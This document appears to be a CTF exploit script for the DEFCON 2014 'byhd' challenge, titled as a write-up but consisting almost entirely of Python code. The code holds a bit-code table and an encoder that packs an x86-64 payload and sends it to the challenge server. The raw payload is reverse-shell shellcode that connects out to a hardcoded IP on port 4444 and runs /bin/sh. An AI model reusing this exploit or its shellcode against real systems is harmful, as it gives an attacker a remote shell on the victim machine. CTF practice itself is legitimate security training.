DEFCON 2014 Writeup byhd
from socket import *
from struct import pack
# Per-byte code table consumed by encode(): maps each byte value 0..255 to the
# list of bits it is emitted as.  The codes are variable length (0x00 is a
# single 0 bit) and are concatenated into one flat bit stream, so the service
# on the other end must hold the same table to decode it -- presumably a
# Huffman-style prefix code recovered from the challenge binary; not verified
# here.
dic = {0: [0], 1: [1, 0, 0, 1, 1, 1], 2: [1, 1, 0, 1, 1, 1, 0], 3: [1, 1, 0, 0, 0, 0, 0, 0], 4: [1, 1, 1, 1, 0, 0, 0, 1, 1], 5: [1, 1, 1, 1, 1, 0, 1, 0, 1, 1], 6: [1, 1, 1, 1, 1, 0, 0, 1, 1], 7: [1, 0, 0, 1, 0, 0, 1], 8: [1, 1, 1, 0, 0, 0, 1, 1], 9: [1, 0, 1, 1, 1, 0, 0, 0, 0, 1], 10: [1, 0, 1, 1, 1, 1, 0, 1, 1], 11: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1], 12: [1, 1, 0, 0, 1, 0, 1, 1, 1], 13: [1, 0, 1, 0, 0, 1, 1, 0, 1], 14: [1, 1, 1, 0, 1, 0, 0, 1, 1], 15: [1, 1, 1, 0, 0, 0, 0, 1], 16: [1, 1, 1, 0, 0, 0, 1, 0], 17: [1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 18: [1, 1, 1, 1, 1, 0, 1, 1, 1], 19: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 20: [1, 1, 1, 0, 1, 0, 0, 1, 0], 21: [1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0], 22: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1], 23: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0], 24: [1, 0, 1, 0, 0, 1, 1, 1, 1], 25: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1], 26: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 27: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 1], 28: [1, 1, 0, 0, 0, 1, 1, 1, 1], 29: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 30: [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1], 31: [1, 0, 1, 0, 0, 1, 1, 0, 0, 1], 32: [1, 0, 1, 1, 1, 0, 1], 33: [1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1], 34: [1, 1, 0, 0, 0, 0, 0, 1, 0, 1], 35: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1], 36: [1, 0, 1, 0, 1, 0, 1, 0, 1], 37: [1, 0, 1, 0, 1, 1, 1, 1], 38: [1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0], 39: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1], 40: [1, 0, 0, 1, 0, 1, 1, 1, 1], 41: [1, 1, 1, 0, 1, 0, 0, 0, 0, 1], 42: [1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1], 43: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1], 44: [1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1], 45: [1, 1, 1, 1, 1, 0, 1, 1, 0, 1], 46: [1, 0, 1, 1, 0, 0, 1, 0], 47: [1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0], 48: [1, 1, 1, 1, 1, 0, 0, 0, 1], 49: [1, 1, 1, 0, 1, 0, 1, 1, 1, 1], 50: [1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0], 51: [1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0], 52: [1, 0, 1, 1, 1, 1, 1, 0, 0, 1], 53: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1], 54: [1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 1], 55: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1], 56: [1, 0, 0, 1, 0, 0, 
0, 0, 0, 1], 57: [1, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0], 58: [1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 1], 59: [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1], 60: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0], 61: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0], 62: [1, 1, 1, 0, 1, 0, 1, 1, 1, 0], 63: [1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0], 64: [1, 1, 1, 0, 0, 1, 1], 65: [1, 1, 0, 0, 0, 1, 0, 1], 66: [1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1], 67: [1, 1, 0, 0, 0, 1, 1, 1, 0], 68: [1, 0, 1, 1, 1, 1, 1, 0, 1, 1], 69: [1, 1, 1, 1, 1, 1], 70: [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0], 71: [1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0], 72: [1, 1, 0, 1, 0], 73: [1, 0, 1, 0, 0, 0, 1, 0, 1, 1], 74: [1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1], 75: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 76: [1, 1, 0, 0, 1, 0, 0, 1, 0, 1], 77: [1, 0, 1, 1, 1, 1, 1, 0, 1, 0], 78: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1], 79: [1, 0, 1, 0, 1, 1, 1, 0, 0, 1], 80: [1, 0, 1, 0, 1, 1, 1, 0, 1], 81: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1], 82: [1, 0, 0, 1, 1, 0, 1, 1], 83: [1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 1], 84: [1, 1, 0, 1, 1, 1, 1, 1, 0, 1], 85: [1, 1, 0, 0, 0, 1, 0, 0], 86: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1], 87: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0], 88: [1, 0, 1, 1, 0, 0, 0, 0, 0, 1], 89: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1], 90: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0], 91: [1, 0, 1, 0, 0, 1, 0, 0, 1], 92: [1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1], 93: [1, 0, 1, 1, 1, 0, 0, 1, 1], 94: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0], 95: [1, 0, 1, 1, 0, 0, 0, 0, 1], 96: [1, 1, 0, 1, 1, 0, 0, 1], 97: [1, 0, 0, 1, 0, 1, 0, 1], 98: [1, 1, 0, 1, 1, 0, 1, 0, 0, 1], 99: [1, 1, 1, 1, 1, 0, 1, 0, 1, 0], 100: [1, 0, 1, 1, 0, 0, 0, 1], 101: [1, 1, 1, 1, 0, 0, 1, 1], 102: [1, 1, 0, 0, 1, 0, 1, 1, 0], 103: [1, 0, 1, 1, 1, 0, 0, 0, 1], 104: [1, 0, 1, 0, 1, 0, 1, 1], 105: [1, 1, 0, 0, 1, 1, 1, 1], 106: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1], 107: [1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0], 108: [1, 1, 1, 0, 1, 0, 0, 0, 1], 109: [1, 1, 1, 0, 1, 0, 1, 1, 0, 1], 110: [1, 1, 1, 1, 0, 0, 1, 0, 1], 111: [1, 1, 0, 1, 
1, 0, 0, 0, 1], 112: [1, 0, 0, 1, 0, 1, 1, 1, 0], 113: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1], 114: [1, 0, 0, 1, 0, 0, 0, 1], 115: [1, 0, 1, 0, 0, 0, 1, 1], 116: [1, 0, 1, 0, 1, 1, 0], 117: [1, 1, 1, 0, 0, 1, 0, 1], 118: [1, 0, 1, 0, 0, 0, 1, 0, 1, 0], 119: [1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0], 120: [1, 1, 1, 0, 1, 0, 1, 1, 0, 0], 121: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1], 122: [1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0], 123: [1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0], 124: [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1], 125: [1, 1, 1, 0, 0, 1, 0, 0], 126: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1], 127: [1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1], 128: [1, 0, 1, 0, 0, 1, 1, 1, 0, 1], 129: [1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1], 130: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0], 131: [1, 1, 0, 0, 0, 0, 1], 132: [1, 0, 0, 1, 0, 1, 1, 0, 1], 133: [1, 0, 0, 1, 0, 1, 0, 0], 134: [1, 0, 1, 0, 0, 1, 0, 0, 0], 135: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1], 136: [1, 0, 1, 0, 0, 0, 1, 0, 0, 1], 137: [1, 1, 1, 1, 0, 1], 138: [1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0], 139: [1, 1, 1, 0, 1, 1], 140: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0], 141: [1, 0, 1, 0, 0, 0, 0, 1], 142: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1], 143: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0], 144: [1, 1, 0, 1, 1, 0, 0, 0, 0], 145: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0], 146: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1], 147: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1], 148: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1], 149: [1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0], 150: [1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0], 151: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0], 152: [1, 0, 1, 0, 0, 0, 1, 0, 0, 0], 153: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1], 154: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0], 155: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0], 156: [1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0], 157: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1], 158: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 159: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1], 160: [1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0], 161: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0], 162: 
[1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1], 163: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1], 164: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0], 165: [1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0], 166: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1], 167: [1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0], 168: [1, 1, 0, 0, 1, 0, 0, 1, 0, 0], 169: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1], 170: [1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0], 171: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1], 172: [1, 0, 0, 1, 1, 0, 0, 1, 1, 1], 173: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0], 174: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 1], 175: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1], 176: [1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1], 177: [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1], 178: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0], 179: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0], 180: [1, 0, 0, 1, 1, 0, 0, 1, 1, 0], 181: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1], 182: [1, 1, 1, 0, 1, 0, 1, 0, 1, 1], 183: [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0], 184: [1, 1, 0, 1, 1, 1, 1, 0], 185: [1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0], 186: [1, 1, 1, 1, 0, 0, 0, 1, 0, 1], 187: [1, 0, 1, 0, 0, 1, 1, 1, 0, 0], 188: [1, 1, 1, 1, 0, 0, 1, 0, 0, 1], 189: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1], 190: [1, 1, 1, 1, 1, 0, 1, 1, 0, 0], 191: [1, 1, 0, 0, 0, 0, 0, 1, 1], 192: [1, 0, 1, 1, 0, 0, 1, 1], 193: [1, 1, 0, 1, 1, 1, 1, 1, 0, 0], 194: [1, 0, 1, 0, 0, 0, 0, 0, 1], 195: [1, 1, 0, 1, 1, 0, 1, 0, 1], 196: [1, 1, 1, 1, 1, 0, 1, 0, 0, 1], 197: [1, 1, 1, 1, 0, 0, 1, 0, 0, 0], 198: [1, 1, 1, 1, 1, 0, 0, 0, 0, 1], 199: [1, 1, 0, 0, 1, 1, 0], 200: [1, 1, 0, 1, 1, 1, 1, 1, 1], 201: [1, 0, 0, 1, 1, 0, 0, 1, 0, 1], 202: [1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1], 203: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1], 204: [1, 0, 1, 0, 1, 0, 0, 1, 1, 1], 205: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0], 206: [1, 1, 1, 0, 1, 0, 1, 0, 1, 0], 207: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], 208: [1, 1, 0, 0, 1, 0, 1, 0], 209: [1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1], 210: [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0], 211: [1, 0, 1, 0, 0, 0, 0, 0, 
0, 1, 0], 212: [1, 0, 0, 1, 1, 0, 0, 1, 0, 0], 213: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1], 214: [1, 0, 0, 1, 1, 0, 0, 0, 1, 1], 215: [1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0], 216: [1, 0, 1, 1, 1, 1, 1, 1], 217: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 1], 218: [1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1], 219: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1], 220: [1, 0, 0, 1, 0, 0, 0, 0, 1], 221: [1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0], 222: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0], 223: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0], 224: [1, 1, 0, 1, 1, 0, 1, 1], 225: [1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0, 1], 226: [1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1], 227: [1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1], 228: [1, 1, 0, 0, 1, 0, 0, 1, 1], 229: [1, 1, 1, 1, 0, 0, 0, 0, 1], 230: [1, 0, 1, 1, 0, 0, 0, 0, 0, 0], 231: [1, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0], 232: [1, 0, 1, 1, 0, 1], 233: [1, 1, 0, 0, 1, 1, 1, 0], 234: [1, 0, 1, 1, 1, 0, 0, 0, 0, 0], 235: [1, 1, 0, 0, 0, 1, 1, 0], 236: [1, 1, 1, 1, 1, 0, 0, 1, 0], 237: [1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0], 238: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0], 239: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1], 240: [1, 0, 1, 1, 1, 1, 0, 1, 0], 241: [1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0], 242: [1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0], 243: [1, 0, 1, 1, 1, 0, 0, 1, 0, 1], 244: [1, 1, 0, 0, 0, 0, 0, 1, 0, 0], 245: [1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0], 246: [1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0], 247: [1, 0, 1, 0, 0, 1, 1, 0, 0, 0], 248: [1, 0, 0, 1, 1, 0, 1, 0], 249: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1], 250: [1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0], 251: [1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0], 252: [1, 0, 1, 0, 0, 1, 0, 1], 253: [1, 1, 0, 1, 1, 0, 1, 0, 0, 0], 254: [1, 0, 0, 1, 0, 1, 1, 0, 0], 255: [1, 0, 0, 0]}
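def encode(shellcode, table=None):
    """Pack *shellcode* into a bit-stream string using a per-byte code table.

    Every input byte is looked up in ``table`` (the module-level ``dic`` by
    default) and its bit list is appended to one long bit stream.  The
    stream is then cut into 8-bit groups, most significant bit first, and
    each group becomes one ``chr`` of the result.  A trailing group shorter
    than 8 bits keeps its bits in the high positions and the low bits are
    zero -- the same padding the original index loop produced.

    Args:
        shellcode: the raw bytes to encode.  A ``str`` is read through
            ``ord`` (the original behaviour); a ``bytes``/``bytearray``
            value, whose iteration already yields ints, is accepted too.
        table: optional ``{byte_value: [bit, ...]}`` mapping used instead of
            the module-level ``dic``; lets the packer be exercised on its
            own.  Defaults to ``dic``.

    Returns:
        A ``str`` of ``chr`` values, one per 8-bit group (empty for empty
        input).

    Raises:
        KeyError: if a byte value has no entry in the table.

    Side effect: the assembled bit list is printed, as the original did
    (debug output; ``print(...)`` keeps it working on Python 2 and 3).
    """
    if table is None:
        table = dic
    bits = []
    for unit in shellcode:
        value = unit if isinstance(unit, int) else ord(unit)
        bits += table[value]
    out = []
    for start in range(0, len(bits), 8):
        group = bits[start:start + 8]
        # MSB-first; a short final group leaves its low bits at zero.
        byte = sum(bit << (7 - j) for j, bit in enumerate(group))
        out.append(chr(byte))
    print(bits)
    # join once instead of repeated str concatenation (quadratic on some
    # interpreters); the result is identical.
    return "".join(out)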
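# Raw machine-code payload handed to encode() unchanged; its contents are not
# decoded here.  This is a Python 2 script (see the print statements above),
# so the literal is a byte string and the chr()-built output of encode() can
# be written to the socket directly.
sendee = "\x48\x31\xed\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x50\x5f\x55\xbb\xb4\x1a\x3a\x80\x48\xc1\xe3\x20\x66\xb8\x11\x5c\xc1\xe0\x10\xb0\x02\x48\x09\xd8\x50\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x79\xf6\x55\x55\x5e\x5a\x55\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
shellcode = encode(sendee)
# The original guarded the size with a bare assert, which `python -O` strips;
# an explicit check keeps the limit enforced.  0x100 is presumably the
# service's receive-buffer size -- confirm against the challenge binary.
if len(shellcode) > 0x100:
    raise ValueError("encoded payload is %d bytes, limit is 0x100" % len(shellcode))
print([shellcode])
p = socket(AF_INET, SOCK_STREAM)
try:
    #p.connect(("192.168.174.219", 9730))
    p.connect(("byhd_147e0accdae13428910e909704b21b11.2014.shallweplayaga.me", 9730))
    # Wire format: little-endian uint32 length prefix, then the encoded body.
    # sendall() loops until every byte is written; the original send() may
    # return after a partial write and silently truncate the message.
    p.sendall(pack("<I", len(shellcode)))
    p.sendall(shellcode)
finally:
    p.close()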